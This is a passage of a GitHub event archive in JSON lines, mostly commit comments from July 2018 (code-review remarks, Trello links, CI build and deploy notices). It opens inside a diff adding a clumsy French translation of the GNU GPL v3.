DOMMAGES.\r\n+\r\n+ 17. Interprétation des articles 15 et 16.\r\n+\r\n+ Si la clause de non-responsabilité et la limitation de responsabilité sont fournies\r\n+ ci-dessus ne peut pas avoir d'effet juridique local selon leurs termes,\r\n+ les tribunaux d'examen appliquent la loi locale qui se rapproche le plus\r\n+ une renonciation absolue à toute responsabilité civile en relation avec\r\n+ Programme, sauf si une garantie ou une prise en charge de responsabilité accompagne\r\n+ copie du programme en échange d'une redevance.\r\n+\r\n+ FIN DES TERMES ET CONDITIONS\r\n+\r\n+ Comment appliquer ces conditions à vos nouveaux programmes\r\n+\r\n+ Si vous développez un nouveau programme, et que vous voulez qu'il soit le meilleur\r\n+ utilisation possible au public, le meilleur moyen d'y parvenir est de le rendre\r\n+ logiciel gratuit que tout le monde peut redistribuer et modifier selon ces termes.\r\n+\r\n+ Pour ce faire, joignez les notices suivantes au programme. C'est le plus sûr\r\n+ pour les attacher au début de chaque fichier source de façon plus efficace\r\n+ énoncer l'exclusion de la garantie; et chaque fichier devrait avoir au moins\r\n+ la ligne \"copyright\" et un pointeur vers l'endroit où l'avis complet est trouvé.\r\n+\r\n+ <une ligne pour donner le nom du programme et une brève idée de ce qu'il fait.>\r\n+ Copyright (C) <année> <nom de l'auteur>\r\n+\r\n+ Ce programme est un logiciel libre: vous pouvez le redistribuer et / ou le modifier\r\n+ il sous les termes de la GNU General Public License telle que publiée par\r\n+ la Free Software Foundation, soit la version 3 de la licence, soit\r\n+ (à votre choix) toute version ultérieure.\r\n+\r\n+ Ce programme est distribué dans l'espoir qu'il sera utile,\r\n+ mais SANS AUCUNE GARANTIE; sans même la garantie implicite de\r\n+ QUALITÉ MARCHANDE ou D'ADAPTATION À UN USAGE PARTICULIER. Voir le\r\n+ GNU General Public License pour plus de détails.\r\n+\r\n+ Vous devriez avoir reçu une copie de la licence publique générale GNU\r\n+ avec ce programme. Sinon, voir <http://www.gnu.org/licenses/>.\r\n+\r\n+ Ajoutez également des informations sur la façon de vous contacter par courrier électronique et papier.\r\n+\r\n+ Si le programme effectue une interaction terminale, faites-en sortir un court\r\n+ remarquez comme ça quand il démarre en mode interactif:\r\n+\r\n+ <programme> Copyright (C) <année> <nom de l'auteur>\r\n+ Ce programme est livré avec ABSOLUMENT AUCUNE GARANTIE; Pour plus de détails, tapez `show w '.\r\n+ Ceci est un logiciel libre, et vous êtes invités à le redistribuer\r\n+ sous certaines conditions; tapez `show c 'pour plus de détails.\r\n+\r\n+ Les commandes hypothétiques `show w 'et` show c' devraient montrer le bon\r\n+ parties de la licence publique générale. Bien sûr, les commandes de votre programme\r\n+ pourrait être différent; pour une interface graphique, vous utiliseriez une \"boîte à propos\".\r\n+\r\n+ Vous devriez également obtenir votre employeur (si vous travaillez en tant que programmeur) ou l'école,\r\n+ le cas échéant, signer un \"disclaimer\" pour le programme, si nécessaire.\r\n+ Pour plus d'informations à ce sujet, et comment appliquer et suivre la GNU GPL, voir\r\n+ <http://www.gnu.org/licenses/>.\r\n+\r\n+ La licence publique générale GNU ne permet pas l'intégration de votre programme\r\n+ dans les programmes propriétaires. Si votre programme est une bibliothèque de sous-programmes, vous\r\n+ peut considérer plus utile de permettre de relier des applications propriétaires avec\r\n+ la bibliothèque. Si c'est ce que vous voulez faire, utilisez le GNU Lesser General\r\n+ Licence publique au lieu de cette licence. Mais d'abord, s'il vous plaît lire\r\n+ <http://www.gnu.org/philosophy/why-not-lgpl.html>."}},"created_at":"2018-07-16T21:49:09Z"}
{"id":"7973162367","type":"CommitCommentEvent","actor":{"login":"Narigo"},"repo":{"name":"compose-us/convert2pdf"},"payload":{"comment":{"id":29726938,"position":4,"line":4,"path":"src/converter.mjs","commit_id":"90ac609c3eb2b7aa91f4ec8b858e73cfd50aa8dc","created_at":"2018-07-16T21:50:27Z","updated_at":"2018-07-16T21:50:27Z","author_association":"CONTRIBUTOR","body":"What is juice?"}},"created_at":"2018-07-16T21:50:27Z"}
{"id":"7973165693","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29726945,"position":5,"line":165,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.cpp","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-16T21:51:14Z","updated_at":"2018-07-16T21:51:14Z","author_association":"CONTRIBUTOR","body":"these could be constexpr, and probably static."}},"created_at":"2018-07-16T21:51:14Z"}
{"id":"7973166254","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29726946,"position":null,"line":null,"path":null,"commit_id":"d4626c91bdc0702df9f9f5cdf5ead570569f7401","created_at":"2018-07-16T21:51:22Z","updated_at":"2018-07-16T21:51:22Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https:///docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/d4626c91bdc0702df9f9f5cdf5ead570569f7401/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-16T21:51:22Z"}
{"id":"7973167389","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29726955,"position":null,"line":null,"path":null,"commit_id":"900a6d68f428d216a2d689b93e7779325be26779","created_at":"2018-07-16T21:51:39Z","updated_at":"2018-07-16T21:51:39Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-16T21:51:39Z"}
{"id":"7973167417","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29726956,"position":null,"line":null,"path":null,"commit_id":"9a13f69ce39e4778f0f1b20120df09889c1e3d74","created_at":"2018-07-16T21:51:40Z","updated_at":"2018-07-16T21:51:40Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Create sidebar \"Header\"](https://trello.com/c/XymYpaIY/24-create-sidebar-header)"}},"created_at":"2018-07-16T21:51:40Z"}
{"id":"7973170414","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29726966,"position":null,"line":null,"path":null,"commit_id":"685079b6709fbd972d6651103833761d508720c0","created_at":"2018-07-16T21:52:24Z","updated_at":"2018-07-16T21:52:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/dGiQ5wzs/8-display-a-list-of-notes)"}},"created_at":"2018-07-16T21:52:24Z"}
{"id":"7973172925","type":"CommitCommentEvent","actor":{"login":"TangledTessellations"},"repo":{"name":"TangledTessellations/front-end-project-week"},"payload":{"comment":{"id":29726972,"position":null,"line":null,"path":null,"commit_id":"ad863dd5108c08c5a52de9d716a11eb3904539d7","created_at":"2018-07-16T21:53:03Z","updated_at":"2018-07-16T21:53:03Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [View an existing note](https://trello.com/c/rTFlzrVb/12-view-an-existing-note)"}},"created_at":"2018-07-16T21:53:03Z"}
{"id":"7973174526","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29726976,"position":null,"line":null,"path":null,"commit_id":"cc16adee08483519f61a92804517b817311225dc","created_at":"2018-07-16T21:53:28Z","updated_at":"2018-07-16T21:53:28Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [View an existing note](https://trello.com/c/nJaPoAdn/3-view-an-existing-note)"}},"created_at":"2018-07-16T21:53:28Z"}
{"id":"7973174881","type":"CommitCommentEvent","actor":{"login":"LeoTheNeopyte"},"repo":{"name":"LeoTheNeopyte/CS570"},"payload":{"comment":{"id":29726977,"position":null,"line":null,"path":null,"commit_id":"cf78b57a8833b2127b34dc7dad28e798bb7ceb6e","created_at":"2018-07-16T21:53:33Z","updated_at":"2018-07-16T21:53:33Z","author_association":"OWNER","body":"Finished Version"}},"created_at":"2018-07-16T21:53:33Z"}
{"id":"7973176251","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29726980,"position":162,"line":388,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.cpp","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-16T21:53:55Z","updated_at":"2018-07-16T21:53:55Z","author_association":"CONTRIBUTOR","body":"A trick I picked up.\r\n\r\n```\r\ntemplate <typename T>\r\nusing Alias = T;\r\n\r\n```\r\n\r\nLets you write array parameters as\r\n\r\n```\r\ntemplate<typename T, size_t N>\r\nvoid foo(Alias<T[N]> myArray);\r\n```\r\n\r\nSo this would be\r\n\r\n`void operator()(std::pair<INT32, INT32>& minmax, float start, float end, const INT32& a, const INT32& b, const INT32& c, Alias<INT32[4]> & coeffs)`"}},"created_at":"2018-07-16T21:53:55Z"}
{"id":"7973177014","type":"CommitCommentEvent","actor":{"login":"kait-schorr"},"repo":{"name":"crispad/Sprint-Challenge--OS-Scheduling"},"payload":{"comment":{"id":29726981,"position":null,"line":null,"path":null,"commit_id":"89ee65b589b72d87c08ad3245e94b56c1f0e00b4","created_at":"2018-07-16T21:54:06Z","updated_at":"2018-07-16T21:54:06Z","author_association":"NONE","body":"It looks great and works perfectly! Good job!"}},"created_at":"2018-07-16T21:54:06Z"}
{"id":"7973179144","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29726986,"position":162,"line":388,"path":"Source/Foundation/bsfCore/Animation/BsAnimationCurve.cpp","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-16T21:54:37Z","updated_at":"2018-07-16T21:54:37Z","author_association":"CONTRIBUTOR","body":"And template typdefs like that (where there's nothing complicated involved) add only a barely measurable increase in compile times.\r\n\r\nTotally worth it, in my opinion."}},"created_at":"2018-07-16T21:54:37Z"}
{"id":"7973182899","type":"CommitCommentEvent","actor":{"login":"LearnToKnowMore"},"repo":{"name":"LearnToKnowMore/ASP.Net-MVC-PartialView"},"payload":{"comment":{"id":29726994,"position":36,"line":36,"path":"PartialViewApplSol/Properties/AssemblyInfo.cs","commit_id":"56d355312693b62119adb3635d9cf87384c8eafd","created_at":"2018-07-16T21:55:33Z","updated_at":"2018-07-16T21:55:33Z","author_association":"OWNER","body":"Reference to log4net config file."}},"created_at":"2018-07-16T21:55:33Z"}
{"id":"7973183813","type":"CommitCommentEvent","actor":{"login":"haydeeR"},"repo":{"name":"haydeeR/Referrals"},"payload":{"comment":{"id":29726998,"position":null,"line":null,"path":null,"commit_id":"5470eed01e7ce20dadd7d52dcdbe06dfe2afb7db","created_at":"2018-07-16T21:55:45Z","updated_at":"2018-07-16T21:55:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Toolbox for where at strong refer form](https://trello.com/c/O0X4LJDZ/40-toolbox-for-where-at-strong-refer-form)"}},"created_at":"2018-07-16T21:55:45Z"}
{"id":"7973186311","type":"CommitCommentEvent","actor":{"login":"JiuqingSong"},"repo":{"name":"Microsoft/roosterjs"},"payload":{"comment":{"id":29727007,"position":29,"line":70,"path":"packages/roosterjs-plugin-image-resize/lib/ImageResize.ts","commit_id":"f301f7fe665b1719f030252484dbec98189c6350","created_at":"2018-07-16T21:56:20Z","updated_at":"2018-07-16T21:56:20Z","author_association":"CONTRIBUTOR","body":"parentElement may not always work well in IE. Suggest using parentNode instead."}},"created_at":"2018-07-16T21:56:20Z"}
{"id":"7973191412","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29727029,"position":9,"line":204,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-16T21:57:30Z","updated_at":"2018-07-16T21:57:30Z","author_association":"CONTRIBUTOR","body":"Is this a copy-constructor? How does the compiler know what to put in the default implementation?"}},"created_at":"2018-07-16T21:57:30Z"}
{"id":"7973193130","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727036,"position":null,"line":null,"path":null,"commit_id":"4bce0d7b85cce437fccb6e8135109c3bba94248e","created_at":"2018-07-16T21:57:56Z","updated_at":"2018-07-16T21:57:56Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 538](https://ci.hashicorp.engineering/viewLog.html?buildId=104436&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T21:57:56Z"}
{"id":"7973193892","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727038,"position":null,"line":null,"path":null,"commit_id":"4bce0d7b85cce437fccb6e8135109c3bba94248e","created_at":"2018-07-16T21:58:08Z","updated_at":"2018-07-16T21:58:08Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 538](https://ci.hashicorp.engineering/viewLog.html?buildId=104436&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-16T21:58:08Z"}
{"id":"7973193902","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727039,"position":null,"line":null,"path":null,"commit_id":"4bce0d7b85cce437fccb6e8135109c3bba94248e","created_at":"2018-07-16T21:58:08Z","updated_at":"2018-07-16T21:58:08Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 539](https://ci.hashicorp.engineering/viewLog.html?buildId=104437&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T21:58:08Z"}
{"id":"7973194186","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29727041,"position":54,"line":396,"path":"Source/Foundation/bsfUtility/Math/BsQuaternion.h","commit_id":"09c75b43855dba8fc2c338226309ed07f32155fc","created_at":"2018-07-16T21:58:12Z","updated_at":"2018-07-16T21:58:12Z","author_association":"CONTRIBUTOR","body":"Potentially can be constexpr"}},"created_at":"2018-07-16T21:58:12Z"}
{"id":"7973194744","type":"CommitCommentEvent","actor":{"login":"doublesharp"},"repo":{"name":"syscoin/syscoin"},"payload":{"comment":{"id":29727043,"position":5,"line":964,"path":"src/assetallocation.cpp","commit_id":"805a35ee22aa789acefb2631aad1b71b77deb1fd","created_at":"2018-07-16T21:58:19Z","updated_at":"2018-07-16T21:58:19Z","author_association":"NONE","body":"nah"}},"created_at":"2018-07-16T21:58:19Z"}
{"id":"7973195282","type":"CommitCommentEvent","actor":{"login":"benmccann"},"repo":{"name":"jtablesaw/tablesaw"},"payload":{"comment":{"id":29727045,"position":null,"line":null,"path":null,"commit_id":"30878f84902b941cb19a74de93ddc86e6577f101","created_at":"2018-07-16T21:58:28Z","updated_at":"2018-07-16T21:58:28Z","author_association":"COLLABORATOR","body":"Sorry. These looked unused. You may want to restore the tests as well"}},"created_at":"2018-07-16T21:58:28Z"}
{"id":"7973195571","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727046,"position":null,"line":null,"path":null,"commit_id":"4bce0d7b85cce437fccb6e8135109c3bba94248e","created_at":"2018-07-16T21:58:33Z","updated_at":"2018-07-16T21:58:33Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 539](https://ci.hashicorp.engineering/viewLog.html?buildId=104437&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:24"}},"created_at":"2018-07-16T21:58:33Z"}
{"id":"7973195580","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727047,"position":null,"line":null,"path":null,"commit_id":"374b0f28dd18835f329cadda113645071854f439","created_at":"2018-07-16T21:58:33Z","updated_at":"2018-07-16T21:58:33Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 540](https://ci.hashicorp.engineering/viewLog.html?buildId=104438&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T21:58:33Z"}
{"id":"7973196348","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29727051,"position":null,"line":null,"path":null,"commit_id":"374b0f28dd18835f329cadda113645071854f439","created_at":"2018-07-16T21:58:44Z","updated_at":"2018-07-16T21:58:44Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 540](https://ci.hashicorp.engineering/viewLog.html?buildId=104438&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:11"}},"created_at":"2018-07-16T21:58:44Z"}
{"id":"7973197488","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29727055,"position":null,"line":null,"path":null,"commit_id":"d52095dcfdf3dc006181641e321251757f159245","created_at":"2018-07-16T21:59:02Z","updated_at":"2018-07-16T21:59:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Increase collider size](https://trello.com/c/tTjwNWvx/60-increase-collider-size)"}},"created_at":"2018-07-16T21:59:02Z"}
{"id":"7973200941","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29727061,"position":null,"line":null,"path":null,"commit_id":"837aa0b90bf6dacbc89e633f0e1c791745a29a1c","created_at":"2018-07-16T21:59:54Z","updated_at":"2018-07-16T21:59:54Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Build Failed\n\nMessages:\n\n * 627 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-837aa0b90bf6dacbc89e633f0e1c791745a29a1c-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-68.78%25-red.png)</a> \n"}},"created_at":"2018-07-16T21:59:54Z"}
{"id":"7973202498","type":"CommitCommentEvent","actor":{"login":"VictorioBerra"},"repo":{"name":"Dotnet-Boxed/Templates"},"payload":{"comment":{"id":29727067,"position":null,"line":null,"path":null,"commit_id":"f3abef2c9e1b8c5c3c7ec4e2666bf29f23f0e487","created_at":"2018-07-16T22:00:16Z","updated_at":"2018-07-16T22:00:16Z","author_association":"NONE","body":"Why do we ad [HttpHead] on all the Gets?"}},"created_at":"2018-07-16T22:00:16Z"}
{"id":"7973203997","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29727072,"position":8,"line":298,"path":"Source/Plugins/bsfVulkanRenderAPI/BsVulkanTexture.cpp","commit_id":"2e9448e63643df6146d953539d43b6f4b1d94fd3","created_at":"2018-07-16T22:00:35Z","updated_at":"2018-07-16T22:00:35Z","author_association":"CONTRIBUTOR","body":"Something to consider for the future.\r\n\r\nYou could define a macro like BS_ASSERT, which, when enabled (e.g. debug builds) would make an assert grab a stack trace, and pop up a window on the screen with the stack trace and some other relevant data.\r\n\r\nWe do that at work, it's super nice."}},"created_at":"2018-07-16T22:00:35Z"}
{"id":"7973204445","type":"CommitCommentEvent","actor":{"login":"zeke"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727073,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:00:42Z","updated_at":"2018-07-16T22:00:42Z","author_association":"MEMBER","body":"Salut @1990b \r\n\r\nJe vais essayer en Français. Allons-y!\r\n\r\nCe truc la est une collection de comptes des utilisateurs de npm. Ceux qui publi les colis. (Oh la, mon Français ecrit, c'est degeulasse!)\r\n\r\nSi tu as un nouveau-ish version de `npm`, tu peux taper `npx trymodule owners` pour voir la liste d'auteurs."}},"created_at":"2018-07-16T22:00:42Z"}
{"id":"7973205917","type":"CommitCommentEvent","actor":{"login":"gtm-agent"},"repo":{"name":"zotoio/serverless-central"},"payload":{"comment":{"id":29727078,"position":null,"line":null,"path":null,"commit_id":"9c427e13df77917a65d6f893b64c8f9e10a149a7","created_at":"2018-07-16T22:01:05Z","updated_at":"2018-07-16T22:01:05Z","author_association":"NONE","body":"### Results for event id: f67aeddd-1742-4983-959b-6a2f2ace349b\n<details><summary>DockerServerless : Deploy to Lambda (eea752) Execution completed.</summary>\n<p>\n\n**output tail (340 lines total):**\n\n```\n...\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'mv' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 100:13-31\n @ ./src/index.js\u001b[39m\u001b[22m\n\n\u001b[1m\u001b[33mWARNING in /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js\nModule not found: Error: Can't resolve 'safe-json-stringify' in '/usr/workspace/clone/node_modules/bunyan/lib'\n @ /usr/workspace/clone/node_modules/bunyan/lib/bunyan.js 90:28-58\n @ ./src/index.js\u001b[39m\u001b[22m\nServerless: Packaging service...\nsample-http/\nsample-http/sample-http.zip\nsample-http/serverless-state.json\nsample-http/cloudformation-template-update-stack.json\nDone in 13.41s.\nrelease package created, uploading to s3://gtmstorage4/releases/sample-http\nCompleted 256.0 KiB/873.4 KiB (582.4 KiB/s) with 1 file(s) remaining\rCompleted 512.0 KiB/873.4 KiB (802.5 KiB/s) with 1 file(s) remaining\rCompleted 768.0 KiB/873.4 KiB (1.1 MiB/s) with 1 file(s) remaining  \rCompleted 873.4 KiB/873.4 KiB (891.5 KiB/s) with 1 file(s) remaining\rupload: ../../output/packages/sample-http-0.0.1.tar.gz to s3://gtmstorage4/releases/sample-http/sample-http-0.0.1.tar.gz\nrelease upload completed!\nApiGateway Endpoints:\n  GET - https://yeajzvl29j.execute-api.ap-southeast-2.amazonaws.com/master/sample-http\nSuccess:  sample-http\nALL DEPLOYS SUCCESSFUL\n>>> packaging deployment output: f67aeddd-1742-4983-959b-6a2f2ace349b-output.tar.gz from output dir..\n>>> uploading output to s3://gtmstorage4/output/f67aeddd-1742-4983-959b-6a2f2ace349b-output.tar.gz\n{\n    \"ETag\": \"\\\"f839047eb59c0e189969761f2b2f5181\\\"\"\n}\nExecution time was 130 seconds.\n\n```\n\n\nhttps://github.com/apocas/dockerode</p></details>"}},"created_at":"2018-07-16T22:01:05Z"}
{"id":"7973206470","type":"CommitCommentEvent","actor":{"login":"zeke"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29727079,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-16T22:01:13Z","updated_at":"2018-07-16T22:01:13Z","author_association":"MEMBER","body":"Dit-moi si ca marche ou pas.."}},"created_at":"2018-07-16T22:01:13Z"}
{"id":"7973214135","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29727100,"position":18,"line":47,"path":"contracts/Remittance.sol","commit_id":"028bd99e70ec883644821a3b8fcd7a0551123935","created_at":"2018-07-16T22:03:09Z","updated_at":"2018-07-16T22:03:09Z","author_association":"NONE","body":"As a matter of style/form, I would find a way to avoid hard-coding this number and even consider an admin/owner function to change it from time to time, i.e. calibrate on-the-fly."}},"created_at":"2018-07-16T22:03:09Z"}
{"id":"7973214424","type":"CommitCommentEvent","actor":{"login":"MayadaSaleh"},"repo":{"name":"MayadaSaleh/Problem-Solving-Practice"},"payload":{"comment":{"id":29727104,"position":45,"line":45,"path":"src/leetcode/TopFrequentElements.java","commit_id":"7aa53894f2674e6498ce33ddb7728627c1dadfc6","created_at":"2018-07-16T22:03:13Z","updated_at":"2018-07-16T22:03:13Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-16T22:03:13Z"}
{"id":"7973214655","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29727105,"position":null,"line":null,"path":null,"commit_id":"735c943e9785c3dd6cfebe8fe5d239d9f07ce1b2","created_at":"2018-07-16T22:03:17Z","updated_at":"2018-07-16T22:03:17Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-786](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-786).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-786-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-16T22:03:17Z"}
{"id":"7973215250","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"etherscan/writecontract"},"payload":{"comment":{"id":29727110,"position":null,"line":null,"path":null,"commit_id":"8b7913d78a1093634a8a52e9fa875f9e52deb240","created_at":"2018-07-16T22:03:27Z","updated_at":"2018-07-16T22:03:27Z","author_association":"NONE","body":"8b7913d"}},"created_at":"2018-07-16T22:03:27Z"}
{"id":"7973215520","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29727112,"position":null,"line":null,"path":null,"commit_id":"40d467d9b8377431b1ac7cc09ade17e2d1950fcc","created_at":"2018-07-16T22:03:31Z","updated_at":"2018-07-16T22:03:31Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T22:03:31Z"}
{"id":"7973217040","type":"CommitCommentEvent","actor":{"login":"pulkitmehra"},"repo":{"name":"harshitmehra93/algo"},"payload":{"comment":{"id":29727116,"position":51,"line":51,"path":"balanced/BinaryTree.java","commit_id":"ac1112e7fd2e1d7239eefbe37ccf65a27c754edb","created_at":"2018-07-16T22:03:55Z","updated_at":"2018-07-16T22:03:55Z","author_association":"COLLABORATOR","body":"This should be outside this class. It doesn't belong here. \r\nSee this class\r\n\r\nhttps://github.com/pulkitmehra/algo/blob/master/src/test/java/com/algo/problems/TreeBasicOperations.java\r\n"}},"created_at":"2018-07-16T22:03:55Z"}
{"id":"7973218751","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29727122,"position":null,"line":null,"path":null,"commit_id":"0decc6ada01aa0b81bd34eb08e380699f8c2b0db","created_at":"2018-07-16T22:04:24Z","updated_at":"2018-07-16T22:04:24Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-388](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-388).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-388-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-16T22:04:24Z"}
